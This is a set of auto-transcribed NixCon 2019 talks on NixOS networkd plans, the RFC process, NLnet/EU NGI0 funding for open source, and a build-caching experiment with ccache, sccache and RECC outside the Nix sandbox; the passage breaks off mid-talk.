NetworkD supports many more features and if we want to expose them as a networking option and people still want to use scripted networking, we have to ensure feature parity or like do a lot of like assertions and that would make the networking module even more complex. So the problem is that we have decision how to move forward. And the thing is we are going to deprecate some of the options in the networking module anyway if we want to switch to NetworkD. And this is actually a chance to redesign the networking module as a whole. So what I am planning is to create an RFC for like this networking module redesign because when I was thinking about it, I got even more questions and I wasn't sure like how to move forward. And that's actually something the community has to answer because like I could implement what I'm thinking is right but that's probably not the right decision for the project. So what's my plan? I would have to have, I would like to have NetworkD turn key ready for 20.03. That means you can use NetworkD in 20.03 without any problems. That's the idea. For that we need that RFC and a little bit of that redesign of the networking module. For 20.09 I would like to have the redesign of the networking module in place which would break like everyone's network configuration probably but yeah that's just a thing we have to do at some point. So what's coming up? So we have to create that RFC at least like before Christmas. So I would like to do a NetworkD sprint this year. What I am proposing is to do it in Munich at the Mayflower office and I've already created a doodle for that. So if you have time and if you want to contribute like discussing about what are the possible solutions for like a new networking module I will create a post in the discourse later today with the doodle link and some of the questions I have for you and I hope some of some people can come and maybe even attend remotely for that sprint and we can create the RFC. Thanks a lot. So next up is Robin Gluster. He's going to talk about the Nixos RFC process but I would like to know is Matthew Bauer around? No okay thank you. So I'll just quickly talk about the Nixos RFC process. In March 2017 Zimba Thomas-Hunger and Morty started the idea and established the first version of the process. We had a few RFCs which were really uncontroversial which were accepted but otherwise everything which needed more discussion. We didn't really have any way of determining if it's going to be accepted or not. So last year at Nixcon Graham, myself, Flockley and a few others sat down and wrote up an RFC trying to improve the RFC process that was accepted in January as RFC 36 and that created one team of five people who for every RFC select team of people who are knowledgeable about that topic who in the end decide and that first team of five is the RFC steering committee whose rotation was defined in RFC 43. That was accepted in June. So we have these three teams or two teams plus the leader of the second team. The RFC steering committee is Elko, Domin, Shay, Mick92 and me. I think I didn't miss anyone. We meet once a week and go through all RFCs. When a new RFC is opened there's a period where people can nominate the so-called shepherds and the RFC steering committee then selects three or four shepherds. The shepherds team is responsible for trying to make sure that the conversation makes sense and actually focuses on the topic. The shepherd leader tries to facilitate meetings with the shepherds and the author so that they can discuss points that are controversial or need further explanation. We'd like to encourage the leaders to actually meet up with the other shepherds and the author more so that because we've had the experience that the meetings actually bring the most benefit in the discussion and move on overseas much faster than just commenting on the FCS. The general process is right on PR and RFC. Then there's this shepherd nomination period of three to four people getting accepted as shepherds. Then a discussion until it at some point hopefully reaches a general acceptance or generally everyone agrees that it probably isn't a good idea in the form that it's mentioned in the RFC. Then the shepherds call the final comment period of 10 days where they say we all unanimously agree that we'd want to accept or close this RFC and then there's a 10-day period where people can bring up new points so the discussion continues or otherwise after the 10 days the RFC is accepted or closed. Then I'm running out of time so there are a number of accepted RFCs and open RFCs for example Flakes and F-Plates is going to open one in networking and then the RFC steering committee is going to be rotated at the end of this year. We are looking for people who would like to be in it and I'm going to open a thread on discourse today. Please nominate yourself or other people and at the end of the year the steering committee will decide on the next steering committee for next year. Thank you. I believe that was our final lightning talk but I would like to quickly just ask the HDMI. Yeah I would like to ask everyone on behalf of the ORGA team to have a look off of the program and submit a review about feedback on every talk that you have some feedback on so you just go to the schedule and on the schedule you can click a talk and then there's a feedback button and just write your honest feedback so NISCON can be even more awesome next year. And yeah I know you're all hungry so we have an hour lunch break and we'll start again at one o'clock.
nix-cluster (xc) - Tomasz Cysz What makes a forematter? - Lars Jellema Nix Gui. Visualizing Nix store and scope - Eugen Shatsky Configuration management with Morph - Marek Mahut Nix-on-Droid: when the low-hanging fruitis also the ripest one - Alexander Sosedkin Hercules CI - Domen Kozar et al.
10.5446/50685 (DOI)
about the EU Next Generation Initiative and the other ways to get your NixOS project funded from Armin. All right, thank you. So, can you hear me? All fine? Okay, good. So, my name is Armin. As some of you might have noticed, I'm probably the only person here not using NixOS. It's actually Fedora. So, while we were, you can say, yeah, you can boom me, you can throw things at me, but only chocolate, please. So, while we were driving here to this conference, Rob just kept saying, like, you know, just give me your laptop. I will just install NixOS right now. And I said, just keep your eyes on the road, okay? All right. So, let's talk about money, that mean, mean, green. So, and how you can get paid for working on an open source project, including NixOS and NixOS. And Neil already talked a little bit about what he did, and I'm going to explain a little bit more about the specifics together with Joss here from NNNET. So, this is an interactive talk. So feel free to ask questions. On the other end, I've got quite a few slides, so you might want to ask them at the end. So, a little bit of a poll. How many of you are currently working, getting paid to work on open source software? So there's one. That's a... So how many of you would like to get paid for it? So then this talk is mostly for you. So, next generation internet. Basically this is something, a program in the Horizon 2020 program, a research program from the EU. And it is about making a more human internet. So that's the blurb that I got from their website, so I'm not going to read it. But basically you have to see it as reimagining and re-engineering the internet. So currently the internet, as we know it is... It has very much has a Silicon Valley imprint, basically. It's DNA, there's a lot of it just screams Silicon Valley. On the other hand, there is also a lot of stuff going on in other parts of the world to create their own internet. So think of what's happening in China, but also in India. If you're following a little bit of what's happening with the internet in India, it can get quite scary. So what their government is trying to do. So the EU, even though it can be considered kind of big and a mollock at times, they want to re-engineer the internet, make it more humane and to get the core values like democracy, diversity and so on ingrained into the internet, to actually make it a better internet. So I think that kind of just is agreeing. So one sub-project of that is NGI0, which I will be talking about today. So NGI0, first of all, it's a consortium with quite a few organizations involved there. I'm not going to run through all of them, but the most important ones, of course, you see there, NixOS Foundation, that's us, yay, and NLNet Foundation and a whole bunch of others where people are thought ahead. Actually I should have had that picture. So there are quite a few organizations involved, things like translations, secure software, packaging, accessibility, you name it. So there are a whole bunch of organizations involved in the NGI0 project. So now we're going to, all right. But before I can explain what we actually do, I need to talk to you a little bit about what a normal grant procedure in the EU looks like. So the normal process to get funds in the Horizon 2020 program or any EU program for that matter is basically like this. You have the former consortium of at least three organizations from various countries or partners from the right parts of Europe. So you get one from North Europe, you get one from the garlic countries and one from the cabbage countries, and then you're usually fine. And so from all geographically, nice, so the right parts, you send in a proposal, then you do stuff for a few years, and then you basically throw something over the wall and you get paid. So sometimes it doesn't even compile or even work or do what it was supposed to do. So this is a very process heavy thing. It's not very suitable for open source because most of us, we like to work in a much more agile way. So do small projects, fast releases, work on tiny things, and then just move on to the next interesting thing because that's how we work. But this process is not for us. It's for the big corporations. It's the big telcos, the big industrial conglomerates who actually have whole departments just writing proposals to get money out of the EU. And if you're actually looked at doing one of those proposals, I did. It's horrible. It doesn't work for us. It's to get, I need to hire something like two, three people to actually do that stuff, and then have to own a payroll. Of course I will get it reimbursed, but it's a lot of overhead. This is totally not suited for SMEs or open source developers. And it's also not helping the public because you get something that might not even work. But you know, it fits the proposal. They got money for it, so it should be good, right? So basically a lot of this money is not working for us. And that is something that should change. So NLNET Foundation basically they organized a consortium and they tried to see like, okay, maybe we can do something that we've already done for the last 20 years. So NLNET Foundation is a Dutch non-profit. They traced their history back to the very first internet provider in the Netherlands. So in 1982, that's before most of you were born. And then they sold their provider off to UUNet, later Verizon. They got a bunch of money. They formed a non-profit and since 1997, so before some of you were born, they've been handing out grants to open source development. So basically what they are doing is a very lightweight approach. Developer says like, I've got this great idea, sends in a proposal, and NLNET looks at it and things like, you know. If you can do this stuff, then we are willing to make a donation to you. And it's super lightweight. Developer starts working, delivers, and then there is a payout after completion of the milestones. And that's just the complete opposite of how the normal EU grants work. And this has been working for a very long time, so more than 20 years. They've sponsored things like DNSSEC, many other things that I don't even remember. There's a whole list on the website. There's a lot of stuff that they've done. So in the background, they've been doing a lot of very good stuff. And also what's important, they're a registered charity in the Netherlands, and at least in the Netherlands and also in some of the countries, you can actually get it because it's a donation from a charity. You don't pay taxes, which can be nice. So, Anelnet wanted to bring this lightweight process to the Horizon 2020 program. So they formed the NGI Zero Consortium. And basically, then they sent in proposals to the EU, and then they were awarded 11.2 million Euro to spend on open source development, which is pretty cool. So and then for two themes, one of them is search and discovery, which is basically unlocking all kinds of data, making sure that people can discover their data in some way. So think search engines, IoT, search, whatever. Anything search and discovery related. And then also privacy enhancing technology. So think security. And the EU is also carefully paying attention to see how this will work because they know that, well, I think that they secretly know that their normal grant process doesn't really work. It doesn't really work for the people in the EU. So they think like, okay, how can we change it? Okay, so the grant program works for some people in the EU, but not the vast majority. So they think like, okay, well, how can we make it work for everyone? So they're paying attention and seeing how things will work out. And then maybe if it's successful, they might expand this. And that would be good for all of us. So just told me that around, so as of today, we've been running this for what, 10 months? One year? And so a bit less than one year. And so far, 4 million euro has been allocated for development in these two domains for about 120 projects. And what is interesting is that 95% of the grant seekers, they've never participated in any of the grants programs of the EU before. So at least in the horizon 2020. So they are now reaching a completely new group of people that are in need of a grant but couldn't get it or didn't want, didn't know how to get it or thought it was way too much overhead. So that's a very good thing. So I already shown that one. And then of course the role of NixOS in this consortium. So NLNIT Foundation, they are big fans of NixOS. We have a history going back a long time even before NixOS started. Because the current director of technology of NLNIT Foundation was actually working for the Dutch Academy of Sciences. And he was the person who basically read Ilko's original proposal and signed off on it. So it is even going back from way before there was NixOS and way before he was working for NLNIT Foundation. So there's a very long history, which is cool. And they really like NixOS. They think it's fantastic. And of course it is. And they are convinced that things like deployment of software, then to make it easy would be very essential to make this project work. Because normally they would get something like, yeah, you know, to run this software you need to run this specific version of Ubuntu with these packages and maybe that patch. Or another component, you need to have SUSE with these packages installed and that out of tree stuff. And they just thought like that's just too cumbersome. That will never, ever work to make it agile, to make it a smooth process. So the ideal is that when a project comes in that we help them with things like packaging software that, and then the software could be demoed and would be like that. Just run NixShell or NixBuild and then just run it and then it would work. That's the ideal. So that's why we are involved. So we've been getting funds to help with things like packaging the software in the projects that are coming in through NGI0 and also to improve the NixOS infrastructure itself to help with the packaging as part of NGI0. So we've been giving some funds. We can choose to spend them as we like as long as they fit within these two categories. So then of course the question is what can you do? One of them is that you could send in a project and please remember that it doesn't have to be about Nix or NixOS itself. It has to be about search and discovery or about privacy enhancing technologies. Anything goes. So the thing is that if you have got a cool idea, even if it's outside of NixOS and you think like, okay, well, you know, this is something that would benefit the world and it's about search and discovery or privacy enhancing technology, send in a proposal. Please. So I think the next deadline is December 1st. So December 1st. So you still have about one and a half months. Packaging software is also something that you could do. And there might be a few opportunities for this in the near future. We're just still looking into this. Or you could help improve infrastructure. There might also be a few opportunities there as well. So you should just come talk to us if you're interested. And then how you should send in a proposal. First of all, keep it concise. So you don't need to send in a PhD thesis. Things like a few pages, clear deadlines, clear milestones, and how much per milestone. That is basically what is needed. And be realistic. Don't ask for the moon because 11.2 million euros is a lot of money, but there's, it has to be spread across many projects. So just keep it, just be realistic. Get big projects into several smaller parts if you would want to. And be patient. So the proposals are first reviewed by an independent committee. And then they're sent off to the EU for additional review. So you have to think of, so one of the reviews that the EU will do is something like looking at if you're not on a blacklist. Because they actually have a blacklist where people who applied for grants but were convicted for fraud or whatever, they would simply not be able to participate. So this process takes some time. It could take some months before you get to go ahead. So if you're thinking like, okay, well, you know, I need to be starting on December 2nd, then well, no. Then you have to calculate that there will be a few months delay in there. It's just how it works. Also get inspiration from existing projects. All of the projects that Anelnet has funded, they are on their website. And the thing is that that is very important. Even if you're not in the EU, you can still send in a proposal. So what is important is that it benefits internet users in the EU. It has to be for a better European internet. But the thing is that something that's good for the world is probably also good for Europe. So even if you're outside of Europe, you can still send in. So I could make an obligatory Brexit joke here. I will not do that. But even if you're in the UK, you can still send it. So some of the approved projects right now. So mixed packages update from Ryan. That is one that was approved. So he will be working on things like automatically checking CVEs to see if there are updates. So if there are updates to packages and then automatically try to integrate it. Spectrum from Alyssa. She's working on that as well. So that also got some funding. And of course you just saw Samuel's talk about mobile NixOS. But of course that's not the only stuff. So some examples of some other projects. One that I am personally very excited about is Be Trusted from Andrew Wong. Some of you might know as Bunny. So he's making a protected hardware device for protected matters. So something like some sort of sleeve for your mobile phone where you can store passwords. And then your phone actually has to access that device to get access to private things. So all those evil apps cannot get access to your private data. And that's something that personally I think is super, super cool. Another one that I have not looked at but which you said is super cool is Verifpal which is about verifying security of cryptographic protocols. Maybe you want to talk about that for a few seconds. Hello. So my name is Joss van Noeve. I actually work for Nelnet. So if you have any questions afterwards about this process just come to me. I'm here until Sunday. So happy to talk about anything. But this Verifpal project, yeah. So cryptographic protocols of course is very important. We are financing this project under the guise of privacy because if something is not safe you cannot protect your privacy. And what Verifpal is is it's a simpler way than of verifying protocols than what academics are using right now. It's very hard to prove that a protocol is secure. And what the author of Verifpal has done, he has created an infrastructure project that makes it much easier to verify this. And on top of that he even used our financing to hire a manga company to write a manual which is completely in manga style. So if you look up Verifpal project you can have some nice manga reading and learn something about security. So I'm not sure what kind of comic book style we should use for NixOS. So and then also another project, Discourse Activity Pup. So you can have a distributed thing with likes according to yours. But that's of course not the only way you can actually get funding. So there are many, many other opportunities to get open source development funding including things like tax cuts and grants. And a lot of people that I talk to, they actually don't know that these opportunities exist. So I just want to highlight a few of them. So in the Netherlands companies can actually get an income tax cut for innovative work. So it's called WBSO. I will not say it in Dutch because most of you would not even understand it. But basically if you're a freelancer or a sole trader or one person company, whatever you want to call it, or you're a limited company, you can basically apply for this and have a tax offset for your income tax, which is very, very useful. So I actually use that for my own company. I spend a minimum of 500 years on research and development. And then I get a tax reduction. So my taxable income is actually lowered with the subsidy. And over that part I basically don't pay any income tax, which easily saves me a few thousand euro per year, which is nice. This is actually quite common for companies to do in another one. There's a whole industry built around these subsidies. So it's sometimes it might feel like it's unethical, but I'm just thinking about, I'm taking back my tax money to do good stuff with it instead of some company that was just built around getting subsidies and then just lining their own pockets, which is very often what happens. So I'm just, this is a good thing. So then there's also starting companies that can get an even higher tax cut. So if you're thinking like, okay, you know, I have a Dutch company. I want to free up some of my personnel's time to actually work in open source software. You have a research proposal, you send it in, you actually get a tax cut and you basically you can deliver something to the world, which is beneficial to a lot of people, which is nice. So of course if you're kind of evil and you're doing things like patents or selling licenses to IP, then in certain, so also in another lens, you can get a very big tax cut on some taxes. So instead of 25%, you only pay 7%. So that's what the big companies are using by selling their IP. So of course I'm hoping that none of you are actually thinking about applying for patents and then licensing them to other people, but that's another discussion we can have. But I'm using this to illustrate that there is a lot of stuff out there that can be used by companies and that actually is being used by companies. And most open source people don't know anything about it and that's a wasted opportunity. So in Sweden, there is also an innovation agency that you can also talk to about research grants called Innova. So I know a few people who've done that successfully and they're also using it to do open source stuff. It's very useful. In the Netherlands, there's the ISDN Fund. So that's the domain registry that has their own fund to work on programs to improve the internet. So you can also apply for something between 10,000 and 75,000 euro for a grant if you're doing something good for the internet. So in Germany, you can go to the KMU Innovative, which is something from one of the federal ministries. So you can actually apply there as well. They have a research and development program and there's things like the prototype fund. These are all open to research and development or open innovation. So in your country, there are most likely opportunities as well. So I haven't even looked at things like Spain, but I'm pretty sure there's something like that there as well. In Italy, there should be in France as well. But it really pays off to do some research into this if you just want to have someone to pay you for doing open source software development or open source research. So if you're in this situation, you're thinking like, okay, well, you know, I really want to work on open source stuff, but I don't know where to get the money from. Just look into this. It can't really pay off. And then basically, Q&A. Anyone? So I want the Mayflower, a medium-sized company, and I'm wondering if I have a project where I want to improve Nix. Would it make more sense to try and do that through the company or independently? I would say that that depends on your contract with your company. So I would first talk to your boss about that, because it might be that your contract actually says that everything you do, even in your spare time, belongs to the company. That's not the case. If that's not the case, it depends on whether or not you would be competing with your company. So what I would do is just first talk to your company, talk to your boss, work something out. And even then, it might be better if the company actually applies for funding. Yeah, so there's, but is there anything on the side of, well, an LNET that would speak for one or the other? So from the side of an LNET, we accommodate both. So if you want to apply as an individual, that's fine. And in some countries, it's easier to get tax cuts, because as was said, if you get a grant from us, basically what happens if you send in a plan, you fulfill what's done in the plan, and then we give you a donation. That's not taxable income. So that's an advantage to you. If however you do it with a company, then the company will have to pay taxes on your salary. So depending on that, you can make the evaluation what would be more beneficial. Obviously you can do it via the company if that's something they would prefer. But you can do it as an individual, as a company, as a combination of a company, individual, non-profit. From our side, anything goes. We just, when you put in a proposal, we accept it, we write a small memorandum of understanding in which we say, when you do this, we give you a donation. And that's who is part of this MOU? It doesn't really matter to us. In this case, there has to be a link to the EU, but that's it. Other questions? Yes. Can you say anything about the, like who reads these? How technical can you get in a proposal? Do you need to dress up certain things? Well, Jose is actually reading those proposals. So I'm just going to give the microphone back to him again. Okay. Well, our employees are, so it can be fairly technical. I mean, I'm a Nixos user. We have more than half of our people are using Nixos. And of that, more than half would be able to write a Nixos recipe themselves, a Nixos expression themselves. So fairly good. That doesn't mean that we know everything about all of the cryptography layers, but we do have a long history of subsidizing projects. So we mainly know not just the technical stuff, but also who are the long-time players already. And we know how to look at, for example, commit histories in projects, if that's something you want to reference. That's something that we can easily understand, even if we don't know the particular library you're talking about. We can very easily look at your commit history somewhere and see, look this guy wants a grant for this project, and he helped start it. Or since half a year he's the maintainer, or he's written this cool feature for it. That's something that we do look heavily at. I don't have so much as a question as an addition to that. I applied with Lizard a project to do open communication stuff. The proposals you get to send in are fairly limited in terms of words. So the amount of technical stuff you can actually squeeze in is fairly limited. If you want to go into details, do straight up, don't have the space for that. So that makes things a bit easier. Hi. Thanks for a great talk. I'm curious about what's your view on collaborations. Say two individuals or two companies would like to make a proposal together. Is that something that you've done before, or how is the process around that? We do that all the time. But what we do often prefer, if a collaboration is fine, if you can split it up so that you have independent projects that have independent deliverables, that's something we always prefer because it makes it easier that if one part of the possible collaboration finishes early, we can already finish off that administratively. Whereas if you're in a collaboration, you depend on that everybody finishes to wrap up the project. But yeah, of course, we very much encourage collaborations and we also encourage that when you apply, you look at the proposals we funded in the past because then you have an idea of the type of projects that we do. It actually goes from very low in the stack to very high. That's something that depends with which wasn't yet very much emphasized. But we have supported hardware, actually routing hardware, but we also support end user applications. So it can be very wide. Thank you. I have a question. So this hasn't been addressed, so I'm curious, with regards of the funding itself, okay, you can get tax cuts, that's great. But what's a reasonable expectation for the funds? Can you get industry standard rates or is it like how does that evaluate in the proposal? So how do you explain the... So of course, if you're a highly paid consultant asking something like 200 euro per hour, forget it. I don't think that the EU will actually say that that's okay. So no, industry standard rates, that's not gonna fly. But I think that what would be a reasonable ballpark figure? As you saw in the presentation, currently we have allocated 4 million, 420 projects. Yeah, I mean, okay, that still depends on how many people and for how long. Most of the projects are single individuals. But yeah, if you would like to go with an hourly rate, then the hourly rate is not consultant level. It also depends where you're living. Basically you are in your proposal, you determine what your hourly rate will be. We just give a donation if we think it's worthwhile. So make an educated guess. Thanks. But I can give you a few hands after this talk. Sorry, just wanted to hook into the same thing, maybe to just simplify the question a little bit. The main question is, is it something where you can say, I want to have a project on which I want to work full time for a year, for example, of which you can pay living costs, for example. Is that the kind of target? Would it be something where you say, not usually when people want to do a long term project like a year, it would have to be a side project next to your normal work, for example. I think that is the kind of thing that is the most interesting thing about that. I think there's actually both. Some people are doing it as a side project for just a few thousand. I think that some people are asking for a bigger grant. So I think that the maximum you can ask is... For a really good first time proposal, we have given out like 50,000. So that should cover your expenses for a long time. But we've also... There was one proposal, for example. He was a really great project to extend an existing project with ActivityPub support. ActivityPub is a standard to sort of build a decentralized social network where everybody just likes each other via messages on their own website. And I'm not sure if it was the one that was extending discourse, but it was a great project which we liked. So we wanted to fund it. And at that point, the guy who was going to do it got accepted into the solid team of Tim Bernsley. And obviously he went for that, but he said, I still want to do that. Can I do it in the weekends and then ask for... Well, much less, obviously. And we were so happy that he was still committed to doing the stuff that he wanted to do before that we accepted it. So you can do it both. You can combine something which you want to do in your spare time or maybe reduce your number of hours a week a bit and in that time work for an LNOT project or try to do it full time. So I think there are no more questions because the microphone has been taken away. So if there are any other questions that you just want to ask us, so both you and I will be here for at least today and tomorrow. And you will also be here on Sunday. I will not be. So just to come up to us, ask questions, we would be more than happy to answer them. All right. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
Since late 2018 NixOS Foundation is participating in the EU's Next Generation Initiative, which will grant a total of 11.2 million Euro to independent researchers and open source developers. This talk will dive into the why and how of the program, how it will benefit NixOS, how you can help us out and also highlight other ways to get your NixOS project funded.
10.5446/50686 (DOI)
So, the last talk of this year's Nixcon is going to be about building outside of the sandbox. Bye, Laos. Like this one is working? Perfect. Okay, so hello everyone. I have this strange pleasure to be the last one to talk at this conference, but there is the old that's precisely made for you to think a bit. I have no real message for you or rather would love to challenge you and think about like what we do a bit differently. So I am known as Laos. I am currently doing a PhD on build systems. We can have a chat about that later on. And this is an experiment that comes from some presentation that I made two years ago. So it will go in very simply with three different examples. I want to build outside of the Nix sandbox and I will use different tools to do that like CKH, SCKH, RCC. You will get explanations of that. And then we have a small discussion about what does it mean, where do we go and final conclusion. So two years ago I was here precisely in front of you and I had this video. We didn't work at the time, but I think it's fixed now. Like yeah. So this video basically shows what happens when you are trying to build a long package like Firefox. For me it's often Firefox, but possibly you are building GTK or anything like that. And then you reach the top, nearly all of the compilation is done and then for some reason at some point, well, there is a fix up thing that doesn't work and bam, you are done. You are just back at the start. And if you want to fix the issue, then you have to pay all of the compilation of the full package. Well, so what's the situation now, two years after that? Well, we cannot build the next package incrementally of course and that's because of the sandbox. So it means that for Firefox, GTK, Libreface, QTE, GCC, well GCC is specific, all of these things you have to build them from scratch every time you make a change to derivation. Possibly that's not something that happens often for you, but if you try to hack into the next package, especially if you want to refactor the standard environment, something that you should never do, but if you work on that, then you will pay that you have to build everything. So my first attempt to escape this sandbox is CK. CK, I guess everyone knows that, no need to explain. It's quite an old tool, but it's still heavily used in some places. And the basic idea with all of these cases is that, well, you already asked me to compile this file with these options and with these headers, so I already know the answer. I can just fetch it from the cache. A small picture, right? So just query the cache and the cache says, well, no, no, it's not there yet. Okay, so you can compile locally and then you upload it to the cache for the next iteration and then you get your results, right? Which means that on the next time, when there is a cache hit, you can just recover the result from the cache and that's it. It should be quite fast. Okay. The funny thing is that I say, well, I want to try that and then I discover that it already exists. It's already feasible in these packages. There is a CKH STDN. That's a standard environment modified that allows you to use CKH. There is a lot of wrapping going on there. We can have a small chat about what that means, but basically if you replace the standard environment with that one, you get CKH working. Well, you get CKH working, but you still have the sandbox, right? So we'll see how to get out of that. But in Nix OS, that's also already provided and then it comes with all the defaults that you need to change into Nix, meaning that you need to build by allowing an extra folder, the cache, to be mounted inside the sandbox. And Nix OS, we do that for you. If you are just using Nix, then you have to use options to do that. They made it in a, I have no idea what they did. That's why the way I should check, but they made it in a very smart way in a sense that you can specify a list of packages that will have this CKH enabled so that you're not breaking the sandbox for everything, but only for these very heavy packages that you will compile often. So if in your company you have one big package like that, you can add it to the list. Okay, let's try the demo then. So the demo will work. I've taken i3 just because it's an average size C++ project. And we will build that normally and then we see CKH to see what it gives. Okay, let's go. Yeah. Okay, so if I want to build i3 normally, I just need to build this i3 stuff and we will try to get that into, we will try to filter the outputs. So it's been modified a bit. Just checking the delivery. So it's been modified a bit because I've added some kind of debugging to it so you can just see the time that each phase takes. So we get this unpack phase, well, that's way below the second, the patch phase way below the second too. I expect something about 10 seconds to build. So you have 8 seconds to configure and 10 seconds to build i3. That's with the sandbox, that's everything's normal except of this extra logging at it. Now, if we start with another tool, we can next build a i3 CKH. Yeah, CKH. If I do it like that, then the sandbox is still active so it won't change anything, right? So you need to add an option. That's an extra sandbox path. With that, I can build and mount the CKH inside the sandbox. Well I don't want to do that at the moment because this cache, we will try to clean it before. So just to be sure that there is nothing in there on the first try. We can start compiling it. And of course I'm still missing that. I'm not sure if you have an idea of what's to be expected but in this case, we are, there is nothing in the cache. So we need to compile everything so we'll have to take the same time. And also we have to pay an extra overhead for serializing and inserting everything into the folder. So this should be a bit slower actually. So now it's 10 seconds and 15 so it matches what we had before. We are from 8 to 10 and from 10 to 15 just because we paid the overhead of initializing everything. So if you want to start with an, we need to compile it again. So I made a special trick for you that you can just say again to the package and well I can't explain you how it works but it's nothing very magic. The nice part is that it starts the exact same compilation with some random stuff added to the derivation so that's the next thing that needs to be done again. And this time it's supposed to be faster. Modulo demo effects. Well, okay, that's not exactly what I used to have but it makes some sense. So what's not, what's, okay, right. So we have all of these. If you don't mind I will take the old results that I had. They are basically the same, 7 and 6, right? That's what we had, 7 and 6. So it's like the rounded numbers are the same. So well nothing unexpected here except that's, well you see that there is this 6 seconds that's below the previous build times and in a sense I3 is not a tool that uses heavy GCC compilations. There are a lot of manual generation documentation generating a lot of random stuff that are not cached by C cache. So of course on a bigger project that uses more C compiling you would have a better speed up here but possibly we will also have a higher penalty on the first time that you use it. Makes sense. Well, is this a good thing? Yeah, the problem is that when you start to make holes in the sandbox like that, well you know you don't have any guarantee of what's happening, right? A small hole in the sandbox and that's over. But at the same time, and we'll have a discussion at the end, and I think it can be a good thing at least in some well-defined situations. Anyway, let's go to the second attempt. So like I wanted to use, well, C cache just good but no people do better things at that. What if I want to use the same cache as my colleague or someone else? We should put that on the network and that's basically the idea of SCC which is shared or shared C cache developed by Mozilla. So it's Mozilla so they made it for C and C++ and then they also added the rest because well, it's Mozilla. And if you look at the diagram, it doesn't change much. Just like basically it's exactly the same, the only change is the name of the cache. It's not a folder, now it's a network machine. Which means that you are not mounting a folder inside the sandbox. You are making a completely different type of hole in there, you need network access. Well is that possible? No. No, it's not possible, it's not supported. You cannot make a small hole and say, okay, I want this machine, I want this port and that server, it doesn't work. So at the moment and for the experiments, what I do is just disable the sandbox. So we are entering strange countries but technically it should be feasible to have like a restricted network access in the sandbox if you want to keep some of the properties but not all of them. Yeah, also discovered that the sandbox is not, disabling the sandbox is not possible when you are building in different stores than your main stores. So all of these demos are just changing my main stores, possibly it breaks things but we'll see. Yeah, okay, disclosure here. I won't do it because for reasons that we don't have much time and also because it's not that different, just disable the sandbox, configure the remote and that's it. So I will go directly to the third attempt which is RECC and RECC, we keep the same ID except that we have the remote execution. That's a tool that has been developed at Bloomberg and they do it mainly because well, they love Bazel, they would like to have all these remote execution and things but they can't move at the moment like migrating all of your builds to Bazel, that's a huge investment so they don't want to do that and they develop this very small replacement that's instead of changing all of the build system, you just wrap each GCC invocation with it and then at that moment everything is sent to the server. Well, you get the better explanation with diagram but what we do in this case is that we remove the local compilation and everything is remote. The main advantage is that you can parallelize a lot more. If you have like 100 workers and a huge workload then you can spread the workload on 100 workers. That's the main advantage of not executing the compilation locally of course. So this is the example that may not work perfectly. I discovered that you need of course a server that allows this remote execution. So in this case it's build grid. I could have used another one but I discovered different issues. Not sure if it's NICs related or my VM related or something but I cannot work in parallel so I can only compile one thing at a time because the server won't take many items at the same time which is a bit stupid. It's not a limitation of the tool. It's used perfectly well in a lot of companies so it's most probably an issue with my setup but anyway. So it's single-threaded and then the worker is quite slow. So if I had to do the demo for you, well that's the time it takes. It takes about three to four minutes to compile now. Well there is definitely some issues. Nevertheless I think this is mostly like bad configuration from my part but I really want to show you what kind of strange things you can discover when you do that. So let's start again. So if we... This is completely stupid. Like it's a build grid server but it's called build form. Well we have to leave with that. Now on this server everything is already compiled so we will remove what's in there. I removed the content that I stored on the server. I removed the database so there is just basically a clean server anyway. And I start the server. I also need to start a worker of course. Yeah that's initialization. And then because I'm lazy I did not specify any kind of docker, worker, any environment. I just like use whatever is on this machine. Well that's it. And now can we make this smaller? Okay right. So what we want to do now is build exactly the same thing as we did before. Yes. So it's Nix build. Okay we want this i3 RCC. I will take the RCC small whatever. This one should be built already. Let's try. Option sandbox false. This is what allows you to access the network. Yeah it's already built. That's good. And the next is already built I guess. Yep. I need to go over and over again. Yeah okay that's working. Very useful when you have to build other things like that. And well no I won't say you. Let's see what we get. It fails. It fails and that's normal. That's what you get on the first attempt. If you're like there is nothing on this remote host you need all of the build inputs. All of the dependencies of your derivation needs to be there in a way. And this is of course not automated. It doesn't work at the moment but then I think there is some potential to make integration and to make Nix catch the network access and wrap it in some way or we should be able to find a way to make this work. At the moment what we have to do is like upload the inputs. So oh crap. So I just try to collect all of the build inputs of my derivation and then I send that to the server. This is a trick. There is always a trick. The network is not that good that I can upload everything but I just removed one of the missing files and this is the one that has just been updated. So if we start again and build this again, again, again thing what do we expect? Does it work now? Well it doesn't work. The tool is still missing. I was at possible we just added the tool that was missing. And in this case it's like one of the most frustrating parts of this is that well the failure is already in the cache. So we are just fetching that. It says previous time it fails. So I can fail again. If you want to work around that then you need to kill everything. In this case I have no idea of removing one entry so just let's be efficient. Okay, everything started clean from scratch so now I can build it. And well of course it takes like three minutes so we won't wait for the end of that. But this time it should work. Let's wait. By the way this VCC dash small is configured in a way that's the cache. VCC is not used in the configure phase because the configure phase just drops a lot of the outputs and so you don't see the error that we had before. That's the reason for the dash small. So it's working. It's compiling one thing at a time. Well it will compile for three minutes. I don't really need it because I have everything in there so let's drop that. Okay. It makes sense. So like you've discovered we need to have all the inputs on the server. It does not exist at the moment but the fact that it failed is also a good thing. It shows that if you are missing the exact compiler that's required by that version on the worker it will say I don't have it. It's not trying to use another thing. It's not trying to use GCC that's installed on that machine. So Nix by design with all of these strange paths and ashes makes it so that you do not pick random stuff. We've discovered that like these impure errors are cached. The fact that there was something missing in the state of the worker like this is part of this is there forever. That's really annoying. So well that's something to care about. But I think we could really automate that. And well the gain is potentially really huge because in Nix if we can have the real exact set of inputs we could share this information through everyone that would be like an either cache for very small C file builds. Well now there is a question of like well this is not pure right. We've broken everything. The balloon has exploded. The sandbox is no more. What remains of the all the good properties that we had with that sandbox. And so like well is it still reproducible? Is it still pure? Is it still hermetic? And all of these nice words that we are used to and that we absolutely want in our builds. And for that I have a small answer that's based on Nix experimental. What I call Nix experimental is like it's an experimental branch from Elko where you can transform a derivation into, that's difficult to say. Well the problem with most of our derivations is that we have plenty of them that look the same, they have the same content but because they come from a different.dv they are stored in a different store path and then that store path is inside the binaries, it's inside a lot of places and if you compare the bits are different. But we can do something that's funny. So let's find the i3. So this is the one that we built before so it's there. If you go to Nix, of course it's a local checkout of Nix and another one because I had to build a different branch. Okay, let's hope that it works correctly. Yeah, you have a lot of outputs in this case. See if I reduce the size, that's still readable for everyone. Well in this case you have a lot of random stuff, let's just cheat a bit. There is a mismatch between the D-man and the Nix that's running and they don't agree on what we are trying to do but you see here that this is the path that we received and this is what it looks like when it's been content addressable. So basically all the closure 